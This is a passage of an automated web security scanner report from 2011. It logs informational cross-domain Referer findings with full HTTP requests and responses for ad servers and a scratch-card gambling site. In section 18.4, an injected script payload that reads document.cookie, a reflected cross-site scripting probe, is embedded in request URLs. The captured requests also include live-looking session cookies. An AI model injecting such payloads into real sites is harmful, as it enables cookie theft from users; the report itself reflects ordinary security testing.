<img height="1" border="0" width="1" alt="" style="display: none;" src="http://va.px.invitemedia.com/goog_imp?returnType=image&key=AdImp&cost=TdEd9gAO8M4K5TsGkp5xaxwSSvDKE_7Qi7O2DA&ex_uid=4_CAESELxIVtdmt3dKafs3FT8t4Q0&creativeID=76103&message=eJyrVjI2VrJSMDI1NTDWUVAyNgJyjM0NjS0NgDxDIEcpJMU1xTLd0d_C18TbNKTYPbvAtCKx3NZWCaQcpKA0LzsvvzwPxAfpNgHSpkDa1NAcyDIBsvJKc3KATDMg08zEyNSyFgAoiRsT&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=41&exchange_id=4' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe>
...[SNIP]...

18.4. http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/N6707/adi/meta.homepage/adminMsg

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=7083343476988375

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png
http://pagead2.googlesyndication.com/pagead/images/i.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CKCfj6HJmPC06gEQrAIY-gEyCMKe-mOicrn-
http://pagead2.googlesyndication.com/pagead/js/abg.js
http://pagead2.googlesyndication.com/pagead/js/graphics.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.metacafe.com/fplayer/%253F4702d%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ebe96a23f3a3%253D1%26hl%3Den%26client%3Dca-pub-3949928662970161%26adU%3Dwww.google.com/nexus%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFU80rI991LD_4hLFdjDcDWvMfB3w

Request

GET /N6707/adi/meta.homepage/adminMsg;pos=rect2;sz=300x300,300x250;atf=no;name=300x250btf;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=8;ord=7083343476988375 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3||t=1305367759|et=730|cs=b-celz5j

Response

18.5. http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427

Issue detail

The page was loaded from a URL containing a query string:

http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B6d73f27533380ecb%3B12ff8dd2e5c,0%3B%3B%3B2381065140,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAAFS7d-C8BAAAAAAAAADUzNTk2ZWY0LTdmYmItMTFlMC1iMGUwLTlmMzlhM2ZiOTE3NgAdjgEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550335?

The response contains the following links to other domains:

http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5384441&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62171182&advid=2993653&sid=1037707&adid=
http://l.betrad.com/ct/0_0_0_0_0_1296/pixel.gif?e=100&v=noscript
http://s0.2mdn.net/2993653/acq_fios_3x_BringHomeAltCA_national_standard_728x90_20110417_Sports.jpg
http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N6296.276969.AUDIENCESCIENCE/B5384441.427;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B6d73f27533380ecb%3B12ff8dd2e5c,0%3B%3B%3B2381065140,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAAFS7d-C8BAAAAAAAAADUzNTk2ZWY0LTdmYmItMTFlMC1iMGUwLTlmMzlhM2ZiOTE3NgAdjgEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550335? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: id=c60bd0733000097|2258832/785797/15105|t=1297260501|et=730|cs=g_qf15ye

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 8277
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 16 May 2011 12:52:21 GMT
Expires: Mon, 16 May 2011 12:52:21 GMT
Discarded: true





<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
...[SNIP]...
.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,http%3a%2f%2fwww22.verizon.com/Residential/Bundles/MarketingLanding/triple_play/triple_play%3Ffiostype%3Dfios1%26CMP%3DBAC-MXT_D_Q2_FT_S_Q_N_Z734"><img src="http://s0.2mdn.net/2993653/acq_fios_3x_BringHomeAltCA_national_standard_728x90_20110417_Sports.jpg" width="728" height="90" border="0" alt="Advertisement" galleryimg="no"></a></noscript>

<script type='text/javascript' language='javascript' src='http://cdn.doubleverify.com/script145.js?agnc=741233&cmp=5384441&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=1&plc=62171182&advid=2993653&sid=1037707&adid='></script>
...[SNIP]...
<noscript><img style="margin:0;padding:0;" border="0" width="1" height="1" src="http://l.betrad.com/ct/0_0_0_0_0_1296/pixel.gif?e=100&v=noscript"/></noscript>

18.6. http://ad.yieldmanager.com/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/imp

Issue detail

The page was loaded from a URL containing a query string:

http://ad.yieldmanager.com/imp?Z=728x90&s=1703625&_salt=78423076&B=12&m=2&r=0

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N6296.276969.AUDIENCESCIENCE/B5384441.427;abr=!ie4;abr=!ie5;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B12ff8dd3330,0%3B%3B%3B3881854700,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAA6jLd-C8BAAAAAAAAADU0MTYxZmQ2LTdmYmItMTFlMC1iNzIxLTkzMjZhMjk0ZDJjMgC-ZwEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550336?
http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B12ff8dd3330,0%3B%3B%3B3881854700,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAA6jLd-C8BAAAAAAAAADU0MTYxZmQ2LTdmYmItMTFlMC1iNzIxLTkzMjZhMjk0ZDJjMgC-ZwEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550336?
http://ad.doubleclick.net/jump/N6296.276969.AUDIENCESCIENCE/B5384441.427;abr=!ie4;abr=!ie5;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B12ff8dd3330,0%3B%3B%3B3881854700,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAA6jLd-C8BAAAAAAAAADU0MTYxZmQ2LTdmYmItMTFlMC1iNzIxLTkzMjZhMjk0ZDJjMgC-ZwEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550336?
http://audit.303br.net/?anId=28&pubId=1709175&advId=431270&vurlId=6127792&campId=3017893&vURL=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D4408%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere

Request

GET /imp?Z=728x90&s=1703625&_salt=78423076&B=12&m=2&r=0 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE
Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; ih="b!!!!$!.`.U!!!!#<y'ux!2$8S!!!!#<y'ui"; bh="b!!!!m!!Zwa!!!!#=!DU4!!ry1!!!!#=!msQ!!uoE!!!!(=!>P_!##!O!!!!#=!DU4!#*.a!!!!#=!o!R!#*VS!!!!#=!o!R!#*Xc!!!!#=!07,!#0%H!!!!#=!msS!#1*0!!!!#=!DU4!#1*h!!!!#=!DU4!#3pS!!!!#=!gBG!#3pv!!!!#=!gBG!#5(U!!!!#=!o!R!#5(W!!!!#=!07,!#5(X!!!!#=!o!R!#5(Y!!!!#=!gBG!#5(_!!!!#=!07,!#5(a!!!!#=!gBG!#5(c!!!!#=!o!R!#5(f!!!!#=!o!R!#C)^!!!!#=!Vkm!#Ie7!!!!#=!dO*!#T?O!!!!#=!dO*!#VSs!!!!#=!o!R!#Zb$!!!!#=!DU4!#Zbt!!!!#=!DU4!#b9/!!!!#<uEax!#b<Z!!!!#=!07,!#b<d!!!!#=!o!R!#b<e!!!!#=!gBG!#b<g!!!!#=!gBG!#b<i!!!!#=!gBG!#b<m!!!!#=!07,!#b<p!!!!#=!07,!#b<s!!!!#=!085!#b<t!!!!#=!085!#b='!!!!#=!gBG!#b?f!!!!#=!msI!#dxJ!!!!#=!DU4!#dxO!!!!#=!DU4!#g:`!!!!#=!DU4!#g=D!!!!#=!DU4!#gar!!!!#=!DU4!#h.N!!!!%=!>qI!#ncR!!!!#=!DU4!#sDa!!!!#=!$y[!#s`9!!!!#=!$y[!#s`=!!!!#=!$yh!#s`?!!!!#=!$yh!#s`D!!!!#=!$y[!#sa7!!!!#=!%!=!#sa:!!!!#=!%!=!#saD!!!!#=!%!=!#sgK!!!!#=!$y[!#sgS!!!!#=!$y[!#sgU!!!!#=!$y[!#sgV!!!!#=!$yh!#vA$!!!!#=!DU4!#x??!!!!'=!nv,!#yGL!!!!#=!DU4!$#4B!!!!#=!DU4!$#4C!!!!#=!DU4!$#4E!!!!#=!DU4!$#?.!!!!#=!Vki!$'?p!!!!#=!$y[!$'AB!!!!#=!$y[!$'AP!!!!#=!$y[!$'AR!!!!#=!$y[!$'AU!!!!#=!$yh!$'AY!!!!#=!%!=!$'L<!!!!#=!$y[!$(Tb!!!!#=!/l7"; uid=uid=c08a423c-7b10-11e0-8d2f-7fbc75b135eb&_hmacv=1&_salt=419862129&_keyid=k1&_hmac=80f2e481993e14f9e9c2e53c8bcda8051c813d3e

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:16 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: raptor0244.rm.bf1
Set-Cookie: ih="b!!!!%!.`.U!!!!#<y'ux!1mR[!!!!#=!o!b!2$8S!!!!#<y'ui"; path=/; expires=Wed, 15-May-2013 12:52:16 GMT
Set-Cookie: vuday1=^cl!`NDf0(d)(<w; path=/; expires=Tue, 17-May-2011 00:00:00 GMT
Set-Cookie: BX=ek8k2sl67ofpa&b=4&s=o9&t=39; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Set-Cookie: lifb=Y%rwY(3p6)LPwl1; path=/; expires=Mon, 16-May-2011 13:52:16 GMT
Cache-Control: no-store
Last-Modified: Mon, 16 May 2011 12:52:16 GMT
Pragma: no-cache
Content-Length: 5144
Content-Type: application/x-javascript
Age: 0
Proxy-Connection: close

new function() {
this.rand = Math.floor((Math.random() + "") * 1000000000000);
this.dvparams = 'ctx=741233&cmp=5384441&plc=62171182&sid=1037707';
this.dvregion = '0';
this.tagsrc = '<IFRAME SRC="http://ad.doubleclick.net/adi/N6296.276969.AUDIENCESCIENCE/B5384441.427;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B12ff8dd3330,0%3B%3B%3B3881854700,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAA6jLd-C8BAAAAAAAAADU0MTYxZmQ2LTdmYmItMTFlMC1iNzIxLTkzMjZhMjk0ZDJjMgC-ZwEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550336?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=\'#000000\'>\n<scr'+'ipt language=\'Javascr'+'ipt1.1\' SRC="http://ad.doubleclick.net/adj/N6296.276969.AUDIENCESCIENCE/B5384441.427;abr=!ie;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B
...[SNIP]...
<NOscr'+'ipt>\n<A HREF="http://ad.doubleclick.net/jump/N6296.276969.AUDIENCESCIENCE/B5384441.427;abr=!ie4;abr=!ie5;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B12ff8dd3330,0%3B%3B%3B3881854700,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAA6jLd-C8BAAAAAAAAADU0MTYxZmQ2LTdmYmItMTFlMC1iNzIxLTkzMjZhMjk0ZDJjMgC-ZwEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550336?">\n<IMG SRC="http://ad.doubleclick.net/ad/N6296.276969.AUDIENCESCIENCE/B5384441.427;abr=!ie4;abr=!ie5;sz=728x90;click=http://ad.yieldmanager.com/clk?2,13%3B5345d626534371e3%3B12ff8dd3330,0%3B%3B%3B3881854700,sIBdAMn-GQB7MIsAAAAAAF0gIwAAAAAAAgAAAAYAAAAAAP8AAAACCJ2IKQAAAAAAdxQaAAAAAAClDC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADP8BAAAAAAAAIAAwAAAAAA6jLd-C8BAAAAAAAAADU0MTYxZmQ2LTdmYmItMTFlMC1iNzIxLTkzMjZhMjk0ZDJjMgC-ZwEAAAA=,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Fzoneid%3D4408%26cb%3Dinsert_random_number_here,;ord=1305550336?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A>
...[SNIP]...
</scr'+'ipt>' );
})();document.write('<img src="http://audit.303br.net?anId=28&pubId=1709175&advId=431270&vurlId=6127792&campId=3017893&vURL=http%3A%2F%2Fd%2Etradex%2Eopenx%2Ecom%2Fafr%2Ephp%3Fzoneid%3D4408%26cb%3Dinsert%5Frandom%5Fnumber%5Fhere">');

18.7. http://d.tradex.openx.com/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/afr.php

Issue detail

The page was loaded from a URL containing a query string:

http://d.tradex.openx.com/afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE

The response contains the following link to another domain:

http://ad.yieldmanager.com/st?ad_type=ad&ad_size=728x90&section=1703625

Request

Response

18.8. http://home.okscratchcards.com/Promotions.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/Promotions.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://home.okscratchcards.com/Promotions.aspx?&mmi=15538

The response contains the following links to other domains:

http://download.neogames-tech.com/Brands/okscratchcards/Website/General/MasterHeader.jpg
http://download.neogames-tech.com/Brands/okscratchcards/Website/General/bottom.gif
http://download.neogames-tech.com/Brands/okscratchcards/Website/General/favicon.ico
http://download.neogames-tech.com/Brands/okscratchcards/Website/General/playnow_button_ENG.gif
http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/5FreePromotion_ENG_GBP.jpg
http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/WeeklySchedule_ENG.html
http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_bottom_left.jpg
http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_bottom_right.jpg
http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_header.jpg
http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_midle_right.jpg
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf
http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf
http://www.gamblersanonymous.org/
http://www.neogames.com/
https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=15538&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 12:14:38 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:38 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/okscratchcards/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a href="/" title="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com">
<img src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/MasterHeader.jpg" border="0" alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com" />
</a>
...[SNIP]...
<br /><a href="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/WeeklySchedule_ENG.html" target="_blank" >
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_header.jpg" /></a>
...[SNIP]...
real chance to win the Jackpot, you...ve come to the right place!
Check out our daily promotions to see what incredible offers, tournaments and prizes we...ve got in store for you!
<a class="PromotionPageLinks" href="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/WeeklySchedule_ENG.html" target="_blank">Click here to see our upcoming promotions</a>
...[SNIP]...
<a href="BonusPolicy.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/5FreePromotion_ENG_GBP.jpg" /></a>
...[SNIP]...
<a href="BonusPolicy.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_midle_right.jpg" /></a>
...[SNIP]...
<a href="InviteFriend.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_bottom_left.jpg" /></a>
...[SNIP]...
<a href="PlayersClub.aspx"><img alt="" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/Promotions/promotion_bottom_right.jpg" /></a>
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
<MAP NAME=footerMapping>
<area href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=secure.neogames-tech.com&lang=en" alt="" coords="200,0,286,50" target="_blank" />
<area href="http://www.neogames.com/" alt="" coords="290,0,410,50" target="_blank" />
<area href="UnderAge.aspx" alt="" coords="414,0,450,50" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/RNG_certificate_080108.pdf" ALT="" coords="454,0,545,50" target="_blank" />
<area href="http://www.gamblersanonymous.org/" alt="" coords="554,0,620,50" target="_blank" />
<area href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" alt="" coords="625,0,780,50" target="_blank" />
</MAP>
...[SNIP]...
<td class="FooterControlImageCell"><img alt="Scratch cards online, Flash Scratch games, Scratch off tickets, Scratchcards, Scratchies, OKscratchcards.com" border="0" src="http://download.neogames-tech.com/Brands/okscratchcards/Website/General/bottom.gif" USEMAP="#footerMapping" /></td>
...[SNIP]...
e EU since May 2007). The Company...s registered address is at 135, High street, Sliema SLM 1549, Malta. The Company operates okscratchcards.com under a provisional license issued and regulated by the <a target="_blank" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf">Lotteries and Gaming Authority</a>
...[SNIP]...

18.9. http://home.okscratchcards.com/visit.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://home.okscratchcards.com
Path:	/visit.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://home.okscratchcards.com/visit.aspx?lr=1&&mmi=15538

The response contains the following link to another domain:

https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CSI=20&SKI=0&CUR=GBP&LNG=ENG&AFI=20&MMI=15538&PRD=&UNIQUEVISITORID=0D6B21683BA25FC6246FC1B2BA546DE0&AR=&PAR=&REGISTRATIONMODE=PM&BO=FM&BD=home.okscratchcards.com&SDN=okscratchcards.com&CORID=&SENTDATE=&COREXPDATE=&GID=

Request

GET /visit.aspx?lr=1&&mmi=15538 HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 302 Found
Connection: close
Date: Mon, 16 May 2011 12:14:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP=\"IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT\"
Location: https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CSI=20&SKI=0&CUR=GBP&LNG=ENG&AFI=20&MMI=15538&PRD=&UNIQUEVISITORID=0D6B21683BA25FC6246FC1B2BA546DE0&AR=&PAR=&REGISTRATIONMODE=PM&BO=FM&BD=home.okscratchcards.com&SDN=okscratchcards.com&CORID=&SENTDATE=&COREXPDATE=&GID=
Set-Cookie: CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=15538&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=okscratchcards.com; expires=Fri, 16-May-2031 12:14:23 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:23 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:23 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:23 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:23 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:14:23 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 460

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://secure.neogames-tech.com/ScratchCards/Lobby.aspx?CSI=20&SKI=0&CUR=GBP&LNG=ENG&AFI=20&MMI=15538&PRD=&UNIQUEVISITORID=0D6B21683BA25FC6246FC1B2BA546DE0&AR=&PAR=&REGISTRATIONMODE=PM&BO=FM&BD=home.okscratchcards.com&SDN=okscratchcards.com&CORID=&SENTDATE=&COREXPDATE=&GID=">here</a>
...[SNIP]...

18.10. http://itunes.apple.com/us/app/pclottery/id399201446 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://itunes.apple.com
Path:	/us/app/pclottery/id399201446

Issue detail

The page was loaded from a URL containing a query string:

http://itunes.apple.com/us/app/pclottery/id399201446?mt=8

The response contains the following links to other domains:

http://a2.mzstatic.com/us/r1000/001/Purple/1d/50/0e/mzi.xelohegg.100x100-75.jpg
